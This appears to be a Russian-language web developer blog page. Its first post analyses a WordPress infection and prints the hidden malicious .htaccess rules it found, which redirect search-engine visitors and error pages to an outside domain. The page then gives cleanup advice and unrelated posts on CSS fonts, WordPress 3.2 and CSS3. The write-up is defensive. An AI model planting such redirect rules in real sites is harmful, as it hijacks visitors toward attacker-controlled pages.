Сегодня столкнулся с новым вирусом на сайте сделанном на WordPress. Нашел я его в файле .htaccess и проявлял он себя в том, что все внутренние ссылки сайта вели на какой-то левый сайт, который даже не открывался. Меня также удивило то, что права доступа у файла были 444 (только чтение).

Вот пример вирусного кода (кстати, на экрана с разрешением меньше 1280 px вы бы увидели пустой файл, сам код находился в строке намного дальше зоны видимости).

1
2
3
4
5
6
7
8
9
10
11
12
13

<ifmodule mod_rewrite.c>																														
RewriteEngine On																														
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)																														
RewriteRule ^(.*)$ http://qimultabannortim.ru/upday/index.php [R=301,L]																														
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)																														
RewriteRule ^(.*)$ http://qimultabannortim.ru/upday/index.php [R=301,L]																														
</ifmodule>																														
 
ErrorDocument 400 http://qimultabannortim.ru/upday/index.php																														
ErrorDocument 401 http://qimultabannortim.ru/upday/index.php																														
ErrorDocument 403 http://qimultabannortim.ru/upday/index.php																														
ErrorDocument 404 http://qimultabannortim.ru/upday/index.php																														
ErrorDocument 500 http://qimultabannortim.ru/upday/index.php

Не так давно очень многие блогеры начали страдать от непонятного вируса JS:Redirector-MC [Trj], который первым обнаружил антивирус Аваст.

Вычислить и удалить вирус можно открыв файл functions.php ваше активного шаблона на блоге. В самом конце файла будет такой код

Этот код нужно удалить и сохранить файл. Кстати, вирус может через некоторое время снова записать себя в файл functions.php, потому советую поставить на него права доступа 444 (только чтение). Если вам нужно постоянно что-то обновлять в этом файле — можно создать свой файл с настройками и просто инклудить его в файл functions.php

И напоследок вот вам ответ происхождения данного вируса

Может кому пригодится:

Список всех стандартных шрифтов в CSS

Verdana, Geneva, sans-serif

Georgia, «Times New Roman», Times, serif

«Courier New», Courier, monospace

Arial, Helvetica, sans-serif

Tahoma, Geneva, sans-serif

«Trebuchet MS», Arial, Helvetica, sans-serif

«Arial Black», Gadget, sans-serif

«Times New Roman», Times, serif

«Palatino Linotype», «Book Antiqua», Palatino, serif

«Lucida Sans Unicode», «Lucida Grande», sans-serif

«MS Serif», «New York», serif

«Lucida Console», Monaco, monospace

«Comic Sans MS», cursive

Дождались! Сообщество разработчиков WordPress объявило о выпуске новой версии одноименной системы управления сайтами (Content Management Systems), получившей индекс 3.2 и распространяемой под лицензией GNU GPL с открытыми исходными кодами.

Среди наиболее заметных новшеств WordPress 3.2 участники проекта выделяют новую тему оформления блогов Twenty Eleven, использующую элементы HTML5, обновленный административный интерфейс и существенно повышенную производительность платформы. Особый акцент делается на прекращении поддержки PHP 4, MySQL 4 и Internet Explorer 6 (ура!), а также исправлениях обнаруженных ошибок в коде продукта. С полным списком реализованных изменений можно ознакомиться здесь..

…

Для всех кто еще не в курсе что такое CSS3, скажу пару слов от себя. Многие ждали обновление технологии и дождались

CSS3 - следующий шаг в развитии каскадных таблиц стилей. Он много нам обещает и, судя по всему, действительно будет прорывом для веб-дизайна и намного облегчит работу верстальщикам. Если, конечно, опять не подкачают разработчики браузеров. На сегодняшний день HTML5 и CSS3 поддерживают такие браузеры (см. рисунок)
…